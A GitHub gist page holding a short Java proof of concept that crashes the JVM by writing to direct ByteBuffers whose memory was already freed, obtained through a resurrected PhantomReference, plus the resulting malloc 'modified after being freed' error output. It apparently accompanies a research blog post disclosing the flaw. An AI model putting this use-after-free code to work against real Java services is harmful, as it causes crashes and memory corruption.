Created
January 20, 2015 22:03
-
-
Save coekie/bcd9dd858292b3a8e372 to your computer and use it in GitHub Desktop.
Revisions
-
coekie created this gist
Jan 20, 2015 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,29 @@ import java.nio.ByteBuffer; import java.util.ArrayList; import java.util.List; // sub-optimal almost-reliable proof of concept JVM crasher. // see http://wouter.coekaerts.be/2015/resurrecting-phantomreference public class ByteBufferUseAfterFree { private static final int SIZE = 100_000; public static void main(String[] args) { List<ByteBuffer> badBuffers = new ArrayList<>(); while (true) { // keep trying until it crashes // create one new buffer pointing to freed memory badBuffers.add(getFreedBuffer(SIZE)); // overwrite all the bad memory references we collected so far for (ByteBuffer badBuffer : badBuffers) { badBuffer.clear(); badBuffer.put(new byte[SIZE]); } } } private static ByteBuffer getFreedBuffer(int size) { System.out.print('.'); // indicate we're making progress Necromancer<ByteBuffer> necromancer = new Necromancer<>(ByteBuffer.allocateDirect(size)); return necromancer.waitForDeathAndResurrect(); } } This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,2 @@ ........java(18061,0x10b5aa000) malloc: *** error for object 0x7f913107e208: incorrect checksum for freed object - object was probably modified after being freed. *** set a breakpoint in malloc_error_break to debug